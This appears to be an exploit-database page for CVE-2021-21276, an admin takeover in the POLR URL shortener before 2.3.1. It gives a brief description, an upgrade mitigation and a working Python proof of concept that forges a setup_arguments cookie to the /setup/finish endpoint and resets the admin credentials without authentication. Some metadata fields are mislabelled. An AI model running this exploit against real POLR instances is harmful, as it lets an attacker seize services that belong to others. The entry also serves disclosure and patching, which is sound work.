header-logo
Suggest Exploit
vendor:
POLR URL
by:
p4kl0nc4t
7.5
CVSS
HIGH
Admin Takeover
284
CWE
Product Name: POLR URL
Affected Version From: < 2.3.0
Affected Version To: < 2.3.0
Patch Exists: YES
Related CWE: CVE-2021-21276
CPE: 2.3.2000
Metasploit:
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=11401https://www.infosecmatter.com/nessus-plugin-library/?id=11714
Platforms Tested: Linux
2021

POLR URL 2.3.0 – Shortener Admin Takeover

An unauthenticated attacker can take over the admin account of POLR URL 2.3.0 by sending a malicious request to the setup/finish endpoint with a setup_arguments cookie containing a JSON payload with the admin credentials.

Mitigation:

Upgrade to POLR URL 2.3.1 or later.
Source

Exploit-DB raw data:

# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover
# Date: 2021-02-01
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>
# Vendor Homepage: -
# Software Link: https://github.com/cydrobolt/polr
# Version: < 2.3.0
# Tested on: Linux
# CVE : CVE-2021-21276


import json

import requests

payload = {
    'acct_username': 'admin',
    'acct_password': 'password',
    'acct_email': 'email@youremail.com',
    'setup_auth_key': True,
}

r = requests.get('http://localhost/setup/finish',
                 cookies={'setup_arguments': json.dumps(payload)})
print(r.text)

Navigation

Suggest Exploit

Services By CQR